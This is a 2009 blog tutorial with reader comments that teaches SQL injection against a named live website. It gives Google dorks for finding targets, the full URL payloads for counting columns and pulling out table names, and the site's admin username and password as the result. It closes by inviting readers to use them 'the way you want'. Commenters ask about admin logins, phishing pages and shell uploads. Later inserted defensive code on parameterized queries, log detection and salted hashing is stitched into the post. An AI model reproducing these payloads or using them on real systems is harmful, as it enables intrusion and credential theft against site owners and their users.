Sql Injection - Practically Detailed

by Nishant.Soni on 08/04/09 at 5:31 pm

We just found a good security expert (Nishant Soni) to teach you some real hard-core hacking stuff. He is going to teach you about SQL Injection, Sniffing, Trojans and many more topics. Hope you enjoy them.

Welcome to my very first tutorial for SQL Injection on Genius Hackers. SQL Injection basically means executing a query in the database connected to a website in order to get personal information out of it that is not visible to a normal user. A database is most likely to be part of a website, and it saves all the information such as user names, passwords, posts and replies. So there is a possibility that you might put some commands, queries or requests (whatever you want to call them) into the database to get some hidden information out of it.

In the past, SQL Injection has been used several times to steal credit card information, e-mail addresses and passwords. Most users have the same e-mail address and password on all of their e-mail accounts, so if you manage to hack one of the accounts, you may get access to all of them. SQL Injection is mostly used by “penetration testers” to check whether their clients' websites are vulnerable to attacks that steal information. In this article I will show you how they do it.

A few simple things are expected of you, and one of them is basic knowledge of computers. This tutorial will tell you how to start, where to stop and what to do. If you have any further queries you can post them here and I will help you work through them.

PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility for whatever damage you do with this knowledge. This is just for educational purposes, so you can secure your own website.
I will divide this tutorial into points to help you understand the structure of the SQL database that works at the backend of the website to store, save and execute the information. I will use a LIVE website in this tutorial, so you can try to test it on your own, and believe me, it really helps to develop your skills. The website that I will use today is www[dot]rfidupdate[dot]com.

To understand what an SQL database is, the simplest explanation I can give is a “website where you can register, log in or create your own profile”: it saves the data you enter into your profile and displays it whenever you provide the correct username and password. In the same way, the website I mentioned above gives you a chance to be a part of it, and it will update you daily with the respective news.

1. How to check if the website is vulnerable to SQL Injection?

A: On most websites I read people saying that you should try to add “`” at the end [without quotes], and that if you get an error the website is vulnerable to SQL Injection. But being an experienced guy in penetration, I'd rather tell you that this is a TOTAL MYTH. The best way to check the site's vulnerability is to add “+order+by+6753” at the end of the URL, because 97% of websites don't have more than 6753 columns. By adding the number 6753 you check whether it has 6753 columns, which it apparently doesn't have. So it will give you an error, and if it does, that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn't have more than 100 columns at the most in its database, so by entering the number 6753 you are making sure that the website gives you an error. If it does, that means you can proceed further.

To check for SQL Injection, it is mandatory that the website points itself to some specific page, i.e. “website.com/index.php?page=11”. In this case the website is pointing itself to page number 11 to pull up some specific information. So, to check whether the website is vulnerable or not, you can try the following URL, i.e. “website.com/index.php?page=11+order+by+6753”.

2. How would I find the vulnerable websites?

A: Google is the best friend of hackers. When I say this, don't assume that I am just writing it because I am supposed to. I really mean it. There is something called “Google dorks”, which are basically commands that can be put into the Google search to find specific groups of pages. Here are some Google dorks which you may try to find the vulnerable websites.

a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you find websites which are connected to and working with SQL databases at the backend. Some of them might be vulnerable to SQL Injection, so you can try to put “order+by+6753” at the end of the URL to check whether it is vulnerable.

Step 1 : Finding Vulnerable Page.

Let's start. As you know, the website that I will test today is www.RfidUpdate.com, so let's open up the website in the browser. Just a little information about the website: RFID means “radio frequency identification”. On the right-hand side you will see that it gives you an opportunity to subscribe to the website. That should give you an idea that when you subscribe, there has to be a place where your e-mail address is saved, so it has to have a database! So now we know that the website is supported by an SQL database at the backend, and we are on the right track.
As I have written earlier, in order to perform an SQL Injection we have to find a page that has “something.php?id=2121” at the end of the URL, so we will try to find such a page on RfidUpdate.com. I found a page by exploring the website a bit. The URL of the page is:

http://www.rfidupdate.com/articles/index.php?id=1563

Image 1: SQL Injection

So now we know it has an SQL database and we have the page we can start with. Let's check whether the website is vulnerable to an SQL attack by adding “+order+by+6753–” as I have written earlier.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–

Now you should notice an error, which says: “Error 1054: Unknown column ‘6753’ in ‘order clause’”

It means that the database gave you a message saying “there is no such column”. The error itself doesn't really make any difference; the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it.

Step 2 : Finding Number of Columns.

The next thing we will try is to find out how many columns this page has. Instead of “6753”, we will start from number 1, then 5, then 15, and keep doing this until we get an error. So, try the following URL.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–

The webpage opened up fine, which means that the website has more than 1 column. Now try number 5.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–

Same thing. Now try 10.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–

Still no error. Try 15.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–

Still no error :(. Try 20.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20-

WHOA! We got the error, which means that the number of columns in the webpage is between 15 and 20. So let's try number “16” now.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–

YAY! You got the error on number “16” as well, which means that the website has 15 columns. So now let's move further.

Step 3 : Using “Union Select All” Command.

Now we will try to combine all the columns and see what we get. The command goes as follows:

http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–

Image 2: SQL Injection

FYI: please notice that I have added “-” before 1563.

Now you see some broken things in there, and the only independent column number you see on the website is “7”. So apparently that will be the base of the attack. Everything we do now will be done with column number “7”. We will try to find some more information about the DATABASE this website is using; to do this we can replace column number 7 with “@@version”, without quotes of course. So try this now.

http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–

Image 3: SQL Injection

This is what you should see now: “5.0.67-community”, which means that the website is using SQL Version > 5. Now try the following URL to move further.

http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%2 0information_schema.tables%20where%20table_Schema=database%20()–

Image 4: SQL Injection

Here, we have replaced column No. 7 with “group_concat(table_name)” and we have added “from information_schema.tables where table_Schema=database()” at the end. These are basically standard SQL commands for getting further information out of the specific column.

YAY! You should have already noticed that the names of the tables have appeared in the list, and one of them is “ru_Admin”. That's what we are looking for. Since we have the admin table now, we will try to find the username and password in it. So let's try the following URL in the address bar.

http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from% 20information_schema.columns%20where%20table_Schema=database%20()–

The only thing we've changed here is “tables” to “columns”, and you should now see all the information about the admin's table, which should look something like the following: “ru_Admin_Username,ru_Admin_Password”

So we see that we might be able to crack the username as well as the password. In order to see the information inside the username and password columns, let's use the following URL:

http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_passw ord),8,9,10,11,12,13,14,15+from%20ru_Admin–

What we did is replace the column names with admin_username & admin_password, and call them from the ru_Admin table at the end.

Image 5: SQL Injection

VOILA! What you're looking at right now is the “admin” username and the password in the following format: username : password.

admin:admRIvuxHahkQ

FYI: Wherever you see “%20” in the URL, that means a SPACE in the address bar.

So you have the password now, and you can use it the way you want! This is the way to perform an SQL Injection attack. You may try your own stuff with the Google dorks I posted in the beginning. Use it the way you want, just keep in mind that if you know 80/100, there are people out there who know 90/100. So better secure yourself first, and try these attacks with the permission of the site owners.
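The steps above work because the page pastes the id value from the URL straight into the text of its SQL query. The following Python sketch is an added example, not code from the original post or from the site it discusses: it reproduces the flaw on a constructed in-memory SQLite database (all table names, column names and data are made up, and SQLite stands in for the MySQL server in the article) and shows both kinds of probe failing against a handler that validates the id and binds it as a parameter.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the site's database; every name and value is made up.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password_hash TEXT);
        INSERT INTO articles VALUES (1563, 'RFID news', 'Article text');
        INSERT INTO admin VALUES ('admin', 'constructed-hash-value');
    """)
    return db


# Constructed probes of the two kinds the article walks through.
ORDER_PROBE = "1563 order by 6753"
UNION_PROBE = "-1563 union all select 1, username, password_hash from admin"


class BadRequest(Exception):
    """Raised for any id the handler refuses; maps to a generic HTTP 400."""


def get_article_vulnerable(db, raw_id):
    # Flaw: the URL value is concatenated into the SQL text, so the database
    # parses it as SQL. Database errors also propagate to the caller.
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def get_article_safe(db, raw_id):
    # 1. Allow-list validation: an article id is 1 to 10 ASCII digits only.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise BadRequest("invalid id")
    # 2. Bound parameter: the value travels separately from the SQL text.
    try:
        cur = db.execute(
            "SELECT id, title, body FROM articles WHERE id = ?", (int(raw_id),)
        )
        return cur.fetchall()
    except sqlite3.Error:
        # 3. Log server-side; never echo the database error to the client.
        raise BadRequest("request failed") from None


def outcome(handler, db, raw_id):
    """Classify what a client would observe for one request."""
    try:
        return ("rows", handler(db, raw_id))
    except BadRequest:
        return ("rejected", None)
    except sqlite3.Error as exc:
        return ("db_error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for handler in (get_article_vulnerable, get_article_safe):
        for raw in ("1563", ORDER_PROBE, UNION_PROBE):
            print(handler.__name__, repr(raw), "->", outcome(handler, db, raw))
```

In PHP the same fix is a prepared statement (PDO or mysqli) with the id bound as an integer, plus a database account for the web application that has no access to tables it does not need.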

Thank you all for reading this tutorial, I am sure it helped. If there are any more questions, feel free to revert back to the same post. Enjoy ethical hacking.

Little About Me: I am from Mumbai, have been in Australia and the U.S. for a few years, and my website can be found at www.TechMafias.com
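Each stage of the walkthrough leaves a recognisable trace in the web server's access log. The following Python sketch is an added example, not part of the original post: it scans constructed log lines (documentation IP addresses, shortened payloads, a common log format that is an assumption) for the ORDER BY column probing, UNION SELECT, @@version and information_schema requests described above, grouped by client.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; addresses come from documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Apr/2009:17:31:02 +0000] "GET /articles/index.php?id=1563 HTTP/1.1" 200 5120
203.0.113.7 - - [08/Apr/2009:17:31:40 +0000] "GET /articles/index.php?id=1563+order+by+6753-- HTTP/1.1" 200 312
203.0.113.7 - - [08/Apr/2009:17:32:05 +0000] "GET /articles/index.php?id=1563+order+by+15-- HTTP/1.1" 200 5120
203.0.113.7 - - [08/Apr/2009:17:32:19 +0000] "GET /articles/index.php?id=1563+order+by+16-- HTTP/1.1" 200 312
203.0.113.7 - - [08/Apr/2009:17:33:10 +0000] "GET /articles/index.php?id=-1563+UNION+ALL+SELECT+1,2,3,4,5,6,@@version,8-- HTTP/1.1" 200 2048
203.0.113.7 - - [08/Apr/2009:17:34:02 +0000] "GET /articles/index.php?id=-1563+union+all+select+1,group_concat(table_name)+from%20information_schema.tables-- HTTP/1.1" 200 2300
198.51.100.4 - - [08/Apr/2009:17:35:00 +0000] "GET /articles/index.php?id=1564 HTTP/1.1" 200 4980
198.51.100.4 - - [08/Apr/2009:17:35:30 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900
"""

# client address and request target from one log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')

# One signature per stage of the walkthrough, matched on the decoded query.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "version_probe": re.compile(r"@@version"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
}
ORDER_BY_N = re.compile(r"\border\s+by\s+(\d+)")


def scan(log_text):
    """Return {client: {"signatures": [...], "order_by_values": [...]}}."""
    findings = defaultdict(lambda: {"signatures": set(), "order_by_values": set()})
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.group(1), match.group(2)
        _, _, query = target.partition("?")
        # Decode %20 and + to spaces, fold case, collapse whitespace runs.
        decoded = re.sub(r"\s+", " ", unquote_plus(query)).lower()
        for name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                findings[client]["signatures"].add(name)
        for number in ORDER_BY_N.findall(decoded):
            findings[client]["order_by_values"].add(int(number))
    return {
        client: {
            "signatures": sorted(found["signatures"]),
            "order_by_values": sorted(found["order_by_values"]),
        }
        for client, found in findings.items()
    }


def enumerating_columns(report, threshold=3):
    # Several distinct ORDER BY positions from one client is the column-count
    # search from Step 2, not a user sorting a result list.
    return len(report["order_by_values"]) >= threshold


if __name__ == "__main__":
    for client, report in scan(SAMPLE_LOG).items():
        print(client, report, "column enumeration:", enumerating_columns(report))
```

Signature matching of this kind is a detection aid for logs or a WAF; it does not replace fixing the query itself.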


42 Responses to “SQL Injection : Ultimate method for Website Hacking.”

1. Ashwin Apr 8th, 2009 Thank you very much.

2. rAX Apr 9th, 2009 Thank you so much for the effort, it’s really educative ! I want to ask you though, what do I need to learn to be a penetration expert? (for good purpose).

3. tez2fast Apr 9th, 2009 Thats Nice 1 Man,… keep On Such Thing,..

4. irad Apr 9th, 2009 thank you….thank you very much

5. Nishant.Soni Apr 9th, 2009 @ rAX, Penetration is a field where you need to gain the knowledge first and then the practical experience, more you explore better you learn. This is the ONLY field which is never gonna die. There are different types of ETHICAL HACKERS, some of for APPLICATION BASED TESTING, some work for WEB TESTING, so it depends where do you want to expertise.

6. Tejas Dave Apr 9th, 2009 lol…..Nishant no offence but im sure u cannot hack sites using sql injection anymore & the passwords u get in sql are in md5 formats or salted md5 so u cant use dem directly.plus direct xml parsing is now old & can b used for hacking small sites which r not even worth a single $.

7. Tejas Dave Apr 9th, 2009 & yes new ways of hacking sites are by rooting servers.thats called real hacking & if u want some examples or tutorials den i can provide u wid dem

8. Nishant.Soni Apr 9th, 2009 @Tejas Dave: We are talking about ETHICAL HACKING In here, and if you are saying that we can not hack the site with SQL Injections, then I am sorry but you’re completely wrong. 1. MD5: Use Cain & Able to decrypt the md5 hashes, its decrypted with the help of bruteforcing attack. 2. I am soon gonna write another article about “uploading shells” with sql injection, so that will basically grant u access to the entire http://ftp. 3. You can easily manipulate config.php with the sql injection, and u can make it vulnerable to RFI or LFI [if u know about them] 4. As far as rooting is concerned, i thought not to post it since I wasn’t sure if the readers are good enough to understand it in just one go.

9. Nishant.Soni Apr 9th, 2009 Yea one more thing, for the MD5 hash cracking, you can have a look at this video. http://techmafias.com/forum/Thread-decrypting-md5-hashes

10. john clay Apr 9th, 2009 well , a nice read material. will love to have more of this to read…simple and straight to the point. 1love Bro.

11. tejas dave Apr 9th, 2009 dude ur telling me that using cain & able u can crack all md5?r u joking.u can crack normal md5 but not salted hashes.

12. Sharad Apr 9th, 2009 I just looking for this. Thanks

13. Randheer Singh Apr 10th, 2009 Thanks very much. I was building a website now I can think on these attacks.

14. Nishant.Soni Apr 10th, 2009 @tejas_dave: Most of the hashes are normal MD5s and if the website is using some specific software like some forum through SMF, phpBB, myBb or a blog like wordpress then the hashes are converted into respective flavors. As far as decrypting the SALTED and the SHVA hashes are concerned, i will write an article soon about that. Please ask your questions out of curiosity, your questions are more about aggression and offense rather than confusion, objection or doubt. We are here to share the knowledge, if you think you something on top of this, then try to write an article, don’t try to create a chaos. P.S.: Please remember, i try to teach ETHICAL, i wudn’t suggest any one to misuse it.

15. Nishant.Soni Apr 10th, 2009 Here is a list of SQL Injection commands / queries which you may try to understand it better.

ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database

16. XERO Apr 11th, 2009 HI Excellent tutorial and it cleared my doubts. However I would like to ask if there are ways to hack PHP pages with similar encoding like SQL injections ? I would like to ask if there are similar techniques involved in hacking PHP based username pass forms or websites ? Thanks -XERO

17. prashanth Apr 11th, 2009 i need to make a fake login page for hotmail… Can you help me with it?? if you can then mail me to “[email protected]

18. Nishant.Soni Apr 12th, 2009 @XERO. It really depends if there are some vulnerabilities in that php page. If you can give an example of the page you’re talking about, it would be easier for me to help you.

19. Syed.atif Apr 13th, 2009 Hello Nishant.Soni i am just a network guy, this article came across me so Just want to request that as an expert of Penetration can u also provide tips and suggestion to secure the sites for this sort of attacks. regards

20. Ajaykumar Apr 14th, 2009 hiiiiiii i’m new to SQL but i understood the concept of ur injection.but i dont know what to do that ADMIN username and password. where shal i use them???

21. Ajaykumar Apr 14th, 2009 at the last of the ur injection we get only admin username only but not the password but u r showing it

22. Nishant.Soni Apr 14th, 2009 @ Syed.atif :- To secure the website from this kind of attack, you have to make sure that your website doesnt follow every path. I mean it should be redirected to the index page if some unknown page is attempted to access. @Ajay kumar: With the admin username and password, you can login to “admin control panel”. Thats ur job to find it. Because i wudn’t prefer to show the admin control panel on that site in here.

23. Drexler Apr 17th, 2009 Thanks for this lesson hummm so interesting,…am new here dough but while going through the process, most of the link displayed error. from the step 2 down. Anyway keep it up…you good…cheer

24. Ajaykumar Apr 17th, 2009 But how can i know the admin page who is providing data base to the site.I’m in initial stages plss help me

25. Ajaykumar Apr 17th, 2009 @Drexler:: hey they are working links from step 2 u have to remove “-” at the end of the links . ru getting me

26. Vinayak Apr 18th, 2009 Thanks Nishant A Very Useful Tutorial I Have Found The Admin Login Page But To Login Do I Need To Use Any Proxy ???

27. Nishant.Soni Apr 19th, 2009 @Vinayak: 1. I don’t support un-ethical stuffs 2. Everyone can track the login logs in admin control panel 3. Rather then trying to mess with the site, i will suggest you to contact the website owner and let them know about the vulnerability.

28. Parag Apr 19th, 2009 Dude the link at the end which leads to username and password does not work.

29. Nishant.Soni Apr 19th, 2009 @Parag: Since i’ve copy pasted the links, the format has been disordered. So, you will have to manually type it into your address bar. It will work

30. askoppal Apr 19th, 2009 @Nishant.Soni MD5(Message-Digest algorithm 5) is an irreversible hash which cannot be ‘decrypted’.If anybody said it can be decrypted its just NONSENSE. Now you may be thinking how Cain & Able and other sites decrypt those MD5 hashes,its done by a simple technique. Just type in text and produce a MD5 encryption of that text. The text and the MD5 hash is then inserted into a table. To ‘decrypt’, cain and able just search in that table for similar hashes, known as an MD5 rainbow table. If I have a password “genius” or “hacker”.You can find it easily on that table because its common words.That’s the reason you shouldn’t use common words as passwords. But if I have a password like “278askoppal345″ chance of being in the database, and is unlikely anyone in the world has the same password. Therefore, it has very “little chance” of ending up in a database. If you want to make it even more secured against decryption (for covering those “little chances”)we use a common technique called salt the password thats what Tejas Dave have mentioned.I will just explain one method of it i.e. adding characters along with password before its being hashed.Even if my password is in the rainbow table the hacker cannot decrypt my password because he doesn’t know my salting technique. Secondly, You cannot have an article on “decrypting salted md5 and SHA” . Because its pointless like making coffee and asking to “decrypt” the milk from it. -askoppal.com “My ignorance always amuses me”

31. Nishant.Soni Apr 20th, 2009 @ askoppal. 1. I like you, because ur the best person who knows how to divert minds from actual topic. 2. What you’re talking about is just CRACKING, what i referred to was “Brute forcing” MD5s. 3. Nice example of coffee and milk, i know u cant decrypt milk out of coffee, but yes you can understand that coffee has, milk, sugar etc.. 4. Y i don’t see any of your articles “mate”!?

32. Nishant.Soni Apr 20th, 2009 @ Askoppal: Sorry i forgot to add. 1. When we talk about MD5, we dont say “hack”, we say “crack”. So it should come to your mind that, the word “crack” means a possibility not certainty. 2. Thats why people release their “dictionaries” so they can be used for “dictionaries cracking attempts” 3. and atlast i ‘ve already wrote about brute forcing above.

33. askoppal Apr 20th, 2009 @Nishant.Soni

NISHANT: I like you, because ur the best person who knows how to divert minds from actual topic.
ASKOPPAL: I am just questioning the statements you made.

NISHANT: What you’re talking about is just CRACKING, what i referred to was “Brute forcing” MD5s.
ASKOPPAL: You make me laugh…. Bruteforcing is a way of cracking.I was talking about PRECOMPUTATION in my comments. Dude its impossible to decrypt MD5 using the method “Brute forcing” You may find internet articles or post where people relate brute forcing and MD5 but its a common mistake,The method they actually mean is “precomputation” (Using rainbow tables). If you are so particular that you can do it please decrypt this normal MD5 hash (It is not salted) which is an easy guess for a security expert like you fedd0876f12728f8ef6890fbfed25edd GH audience will be eager to see you decrypting those, don’t disappoint them Nishant.

NISHANT: Nice example of coffee and milk, i know u cant decrypt milk out of coffee, but yes you can understand that coffee has, milk, sugar etc..
ASKOPPAL: You wont know coffee has adequate amount of milk and sugar unless you taste it

NISHANT: Y i don’t see any of your articles “mate”!?
ASKOPPAL: I blog at http://45k.me sponsored by Sathish

NISHANT: When we talk about MD5, we dont say “hack”, we say “crack”. So it should come to your mind that, the word “crack” means a possibility not certainty.Thats why people release their “dictionaries” so they can be used for “dictionaries cracking attempts” and atlast i ‘ve already wrote about brute forcing above.
ASKOPPAL: You are proving yourself to be a jackass or an english mentor or something else.The above statement is just nonsense.

-askoppal.com “My ignorance always amuses me”

34. askoppal Apr 22nd, 2009 The hash value fedd0876f12728f8ef6890fbfed25edd which I gave to Nishant is decrypted to N.i.s.h.a.n.t S.o.n.i You can confirm the accuracy of the hash using an on-line hash generator created by me http://45k.me/blog/2009/04/md5-sha1-sha256-hashing/ If we use a Bruteforce method it would took around 262800 hrs. i.e. 30 years in a 3 Ghz , 2Gb RAM equipped system to decrypt the above hash even if i know the keyspace of the password.So Brute force ain’t a good technique to crack admin’s password. -askoppal
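The exchange above turns on precomputed lookup tables, salting and guessing speed. The following Python sketch is an added example, not code from any commenter: it shows a precomputed table recovering an unsalted MD5 of a common word, then the same password stored with a random per-user salt and PBKDF2-HMAC-SHA256 (a slow key-derivation function used here in place of MD5; the word list, record format and iteration count are assumptions). The salt is stored next to the hash and is not secret; its job is to make every record unique so that no precomputed table applies, while the iteration count makes each remaining guess expensive.

```python
import hashlib
import hmac
import os

# Constructed word list standing in for a public password dictionary.
COMMON_PASSWORDS = ["genius", "hacker", "password", "123456"]
ITERATIONS = 100_000  # assumption for the example; tune to your hardware


def build_lookup_table(words):
    # Precomputation: hash every candidate once, reuse against any database.
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def store_unsalted_md5(password):
    # The weak scheme discussed in the thread.
    return hashlib.md5(password.encode()).hexdigest()


def store_salted(password):
    # Random 16-byte salt per record, stored alongside the derived key.
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${key.hex()}"


def verify_salted(password, stored):
    _, iterations, salt_hex, key_hex = stored.split("$")
    key = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(key.hex(), key_hex)


def table_lookup(table, stored):
    """What a precomputed table yields for one stored value (None = miss)."""
    return table.get(stored)


def dictionary_attack(words, stored):
    # With a salt, every guess must be recomputed for every single record.
    for word in words:
        if verify_salted(word, stored):
            return word
    return None


if __name__ == "__main__":
    table = build_lookup_table(COMMON_PASSWORDS)
    print("unsalted md5:", table_lookup(table, store_unsalted_md5("genius")))
    first, second = store_salted("genius"), store_salted("genius")
    print("same password, different records:", first != second)
    print("table against salted record:", table_lookup(table, first))
    print("per-record guessing, weak password:", dictionary_attack(COMMON_PASSWORDS, first))
    strong = store_salted("278askoppal345")
    print("per-record guessing, uncommon password:", dictionary_attack(COMMON_PASSWORDS, strong))
```

A common word is still found by per-record guessing, so salting and a slow hash complement a strong password rather than replace it.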

35. Nishant.Soni Apr 23rd, 2009 @askoppal: That is the only reason i said it isnt 100%. MD5 is a nice algorithm. It may work it may not. OR u may have to wait for a long time.

36. raaghav Apr 23rd, 2009 nice tutorial , i ll try it on other sites too

37. Panwar Apr 27th, 2009 Thanks for nice article everything is clear but i am stuck at two points. 1-How to find sites where we can put sql injections as you described it well but if you plz put some more light on it then it will be very usefull. 2-Last url is not working to get username and password as i have also added code manually in second last url, i mean i add admin_username & admin_password and put ru_Admin but no work. Also from where we have to start learning from newbie to expert, so we can safe our sites ?

38. junaid Apr 28th, 2009 thanks, it really helping

39. xXXh4Ck3rXXx Apr 28th, 2009 hey dude the tuts if u make a video becomes more user friendly and try and teach others advanced thing this is t00 n00bish and too basic

40. Neo_Warez May 1st, 2009 Dude! I love this post, i think this is the first time i’m posting here on Genius Hackers…..I love ur post!!

41. des May 5th, 2009 Hello Nishant, I wonder what is your nick name on techm forum, I would like to have your opinion on the topic, which I recently open there. thx.

42. Kalpana Jun 2nd, 2009 hi Nishant Thanks its a good article. My question is can we login in to a web page without userid and pwd??? i read an article by viewing web page source we can login ex: ‘ or 1=1– using these types
